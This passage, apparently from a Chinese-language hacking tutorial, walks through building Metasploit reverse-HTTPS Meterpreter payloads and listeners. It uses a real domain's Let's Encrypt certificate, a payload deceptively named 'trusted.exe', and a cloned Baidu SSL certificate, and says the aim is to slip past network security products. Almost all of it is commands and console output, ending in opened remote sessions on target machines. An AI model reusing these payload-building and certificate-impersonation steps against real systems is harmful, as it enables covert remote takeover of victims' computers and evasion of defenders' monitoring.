root@iZj6ccx9c36agbjm7ekf9mZ:/tmp# ls /etc/letsencrypt/live/gpt5.onl/
cert.pem chain.pem fullchain.pem privkey.pem README
建立一個包含 privkey.pem 和 cert.pem 的統一證書檔案;使用 cat 指令
root@Z:/tmp# cd /etc/letsencrypt/live/gpt5.onl/
root@Z:/etc/letsencrypt/live/gpt5.onl# cat privkey.pem cert.pem >> /root/msfcert.pem
3、在雲伺服器上安裝metasploit-framework
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
4、設定監聽和payload
設定監聽和payload,設定StagerVerifySSLCert為true,表示啟用SSL驗證,同時設定EnableStageEncoding來對第二階段的有效載荷進行編碼。
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf6 exploit(multi/handler) > set LHOST gpt5.onl
LHOST => gpt5.onl
msf6 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf6 exploit(multi/handler) > set HandlerSSLCert /root/msfcert.pem
HandlerSSLCert => /root/msfcert.pem
msf6 exploit(multi/handler) > set StagerVerifySSLCert True
StagerVerifySSLCert => True
msf6 exploit(multi/handler) > set EnableStageEncoding true
EnableStageEncoding => true
msf6 exploit(multi/handler) > exploit
[-] Handler failed to bind to 8.217.125.192:443
[*] Started HTTPS reverse handler on https://0.0.0.0:443
浏覽器通路https://yourdomain,看到https鎖和It works,表示證書配置成功
5、接下來,建立有效載荷,使用你的域名作為LHOST
root@iZj6ccx9c36agbjm7ekf9mZ:/tmp# msfvenom -p windows/meterpreter/reverse_https LHOST=gpt5.onl LPORT=443 -f exe -o trusted.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 678 bytes
Final size of exe file: 73802 bytes
Saved as: trusted.exe
root@iZj6ccx9c36agbjm7ekf9mZ:/tmp#
6、在目标機運作生成的載荷,成功收到傳回的會話
[*] Started HTTPS reverse handler on https://0.0.0.0:443
[!] https://gpt5.onl:443 handling request from 58.20.23.45; (UUID: ezhwevva) Without a database connected that payload UUID tracking will not work!
[*] https://gpt5.onl:443 handling request from 58.20.23.45; (UUID: ezhwevva) Meterpreter will verify SSL Certificate with SHA1 hash 9c6ad9e3e5b14efa789b493030c649367c0537f3
[*] https://gpt5.onl:443 handling request from 58.20.23.45; (UUID: ezhwevva) Encoded stage with x86/shikata_ga_nai
[*] https://gpt5.onl:443 handling request from 58.20.23.45; (UUID: ezhwevva) Staging x86 payload (176761 bytes) ...
[!] https://gpt5.onl:443 handling request from 58.20.23.45; (UUID: ezhwevva) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (172.26.166.192:443 -> 101.21.29.45:24225) at 2023-04-19 09:37:58 +0800
meterpreter > getuid
Server username: DESKTOP-RUJ38GQ\win10
#其他
繞過網絡安全解決方案的另一種更簡單的方法是使用 HTTP SSL Certificate Impersonation輔助子產品模拟一個SSL證書,然後使用它加密有效載荷和偵聽器之間的通信。首先,我們需要模拟一個證書,這意味着我們将複制一個遠端 SSL證書并使用來自遠端的資訊建立本地(自簽名)版本版本。在這裡,我們将模拟 www.baidu.com的證書
msf6 exploit(multi/handler) > use auxiliary/gather/impersonate_ssl
msf6 auxiliary(gather/impersonate_ssl) > set RHOSTS www.baidu.com
RHOSTS => www.baidu.com
msf6 auxiliary(gather/impersonate_ssl) > run
[*] Running module against 180.101.50.242
[*] 180.101.50.242:443 - Connecting to 180.101.50.242:443
[*] 180.101.50.242:443 - Copying certificate from 180.101.50.242:443
/C=CN/ST=beijing/L=beijing/OU=service operation department/O=Beijing Baidu Netcom Science Technology Co., Ltd/CN=baidu.com
[*] 180.101.50.242:443 - Beginning export of certificate files
[*] 180.101.50.242:443 - Creating looted key/crt/pem files for 180.101.50.242:443
[+] 180.101.50.242:443 - key: /root/.msf4/loot/20230418204922_default_180.101.50.242_180.101.50.242_k_901740.key
[+] 180.101.50.242:443 - crt: /root/.msf4/loot/20230418204922_default_180.101.50.242_180.101.50.242_c_291923.crt
[+] 180.101.50.242:443 - pem: /root/.msf4/loot/20230418204922_default_180.101.50.242_180.101.50.242_p_080465.pem
[*] Running module against 180.101.50.188
[*] 180.101.50.188:443 - Connecting to 180.101.50.188:443
[*] 180.101.50.188:443 - Copying certificate from 180.101.50.188:443
/C=CN/ST=beijing/L=beijing/OU=service operation department/O=Beijing Baidu Netcom Science Technology Co., Ltd/CN=baidu.com
[*] 180.101.50.188:443 - Beginning export of certificate files
[*] 180.101.50.188:443 - Creating looted key/crt/pem files for 180.101.50.188:443
[+] 180.101.50.188:443 - key: /root/.msf4/loot/20230418204922_default_180.101.50.188_180.101.50.188_k_649340.key
[+] 180.101.50.188:443 - crt: /root/.msf4/loot/20230418204922_default_180.101.50.188_180.101.50.188_c_069464.crt
[+] 180.101.50.188:443 - pem: /root/.msf4/loot/20230418204922_default_180.101.50.188_180.101.50.188_p_593798.pem
[*] Auxiliary module execution completed
現在我們有了證書,我們可以使用MSFvenom來建立我們的有效載荷;通過設定HandlerSSLCert和StagerVerifySSLCert選項在有效載荷中使用該證書.
msfvenom -p windows/meterpreter_reverse_https LHOST=120.26.195.237 LPORT=443 HandlerSSLCert=/root/.msf4/loot/20230418204922_default_180.101.50.188_180.101.50.188_p_593798.pem StagerVerifySSLCert=true -f exe -o payload.exe
設定監聽
msf6 auxiliary(gather/impersonate_ssl) > use exploit/multi/handler
[*] Using configured payload windows/meterpreter/reverse_https
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter_reverse_https
PAYLOAD => windows/meterpreter_reverse_https
msf6 exploit(multi/handler) > set LHOST 120.26.195.237
LHOST => 120.26.195.237
msf6 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf6 exploit(multi/handler) > set HandlerSSLCert /root/.msf4/loot/20230418204922_default_180.101.50.188_180.101.50.188_p_593798.pem
HandlerSSLCert => /root/.msf4/loot/20230418204922_default_180.101.50.188_180.101.50.188_p_593798.pem
msf6 exploit(multi/handler) > set StagerVerifySSLCert true
StagerVerifySSLCert => true
msf6 exploit(multi/handler) > exploit
[*] Meterpreter will verify SSL Certificate with SHA1 hash f5b5b2aa2001fa7cff8b37816d2597292d1edc31
[-] Handler failed to bind to 120.26.195.237:443
[*] Started HTTPS reverse handler on https://0.0.0.0:443
[!] https://120.26.195.237:443 handling request from 102.227.59.19; (UUID: mynlncwc) Without a database connected that payload UUID tracking will not work!
[*] https://120.26.195.237:443 handling request from 102.227.59.19; (UUID: mynlncwc) Redirecting stageless connection from /RfPa2IPcyDJjR2JGB3nw1ApGWGhCwCJxnyNGBnyDCbiuvoUJt9qgog57OU5nrKQfzZdcfzuMA4A2SvObJnZ8eNyx6WI2WnMnGuCGuuaZYebjnnbieRn5 with UA 'Mozilla/5.0 (Windows NT 9.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36'
[!] https://120.26.195.237:443 handling request from 102.227.59.19; (UUID: mynlncwc) Without a database connected that payload UUID tracking will not work!
[*] https://120.26.195.237:443 handling request from 102.227.59.19; (UUID: mynlncwc) Attaching orphaned/stageless session...
[!] https://120.26.195.237:443 handling request from 102.227.59.19; (UUID: mynlncwc) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (172.23.240.156:443 -> 102.227.59.19:58210) at 2023-04-18 20:56:54 +0800
meterpreter >
在目标機上運作payload。
成功收到一個會話。